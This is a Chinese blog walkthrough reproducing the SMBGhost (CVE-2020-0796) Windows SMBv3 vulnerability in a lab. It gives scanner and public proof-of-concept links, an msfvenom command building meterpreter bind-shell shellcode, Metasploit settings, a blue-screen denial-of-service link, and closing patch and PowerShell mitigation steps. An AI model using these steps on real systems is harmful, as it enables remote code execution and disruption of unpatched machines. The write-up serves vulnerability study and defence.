CVE-2020-0796 - SMBv3漏洞复现与提权

CVE-2020-0796 - SMBv3提权
微软发布安全公告,发布了一个最新的SMB远程代码执行漏洞( CVE-2020-0796 )“永恒之黑”,攻击者可以利用漏洞进行提权实现代码执行。

提权准备工作
1、首先下载扫描器,进行检测
下载地址:

https://github.com/ollypwn/SMBGhost

python3 scanner.py <ip>

将Windows目标机的防火墙关闭,让攻击机可以ping通ip
可以看到
在这里插入图片描述
2、下载好可利用的POC

https://github.com/chompie1337/SMBGhost_RCE_PoC

生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=192.168.220.150 LPORT=3333 -f python -o test.py

CVE-2020-0796 - SMBv3漏洞复现与提权_第1张图片
启动msf
设置payload

set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.220.156
set LPORT 3333

CVE-2020-0796 - SMBv3漏洞复现与提权_第2张图片
将test.py中的code替换poc中的code
CVE-2020-0796 - SMBv3漏洞复现与提权_第3张图片
CVE-2020-0796 - SMBv3漏洞复现与提权_第4张图片
执行刚刚下载好exploit
CVE-2020-0796 - SMBv3漏洞复现与提权_第5张图片
执行msf中的payload
CVE-2020-0796 - SMBv3漏洞复现与提权_第6张图片
操作
CVE-2020-0796 - SMBv3漏洞复现与提权_第7张图片
CVE-2020-0796 - SMBv3漏洞复现与提权_第8张图片
蓝屏攻击
蓝屏POC链接

https://github.com/jiansiting/CVE-2020-0796
https://github.com/chompie1337/SMBGhost_RCE_PoC
CVE-2020-0796 - SMBv3漏洞复现与提权_第9张图片
CVE-2020-0796 - SMBv3漏洞复现与提权_第10张图片

漏洞修补与防范
更新最新补丁关闭危险端口号(445、139)
禁用SMBv 3压缩
您可以禁用压缩以阻止未经身份验证的攻击者利用针对SMBv 3服务器使用下面的PowerShell命令。

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

官方链接

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796

参考文章

https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247487340&idx=1&sn=e74c796edeeccbc4be5b1ca66b7cd48f&chksm=fe7a2bf4c90da2e24692d407f7aa7481f440d0a56e2127894d927a9fd2add0de5567b97cdf7e&mpshare=1&scene=23&srcid=060666qUfZADbQpK6EyQF0q0&sharer_sharetime=1591432448856&sharer_shareid=68a0ddd9c9ffcc9062ebb3909d898b9a#rd

你可能感兴趣的:(各种漏洞复现)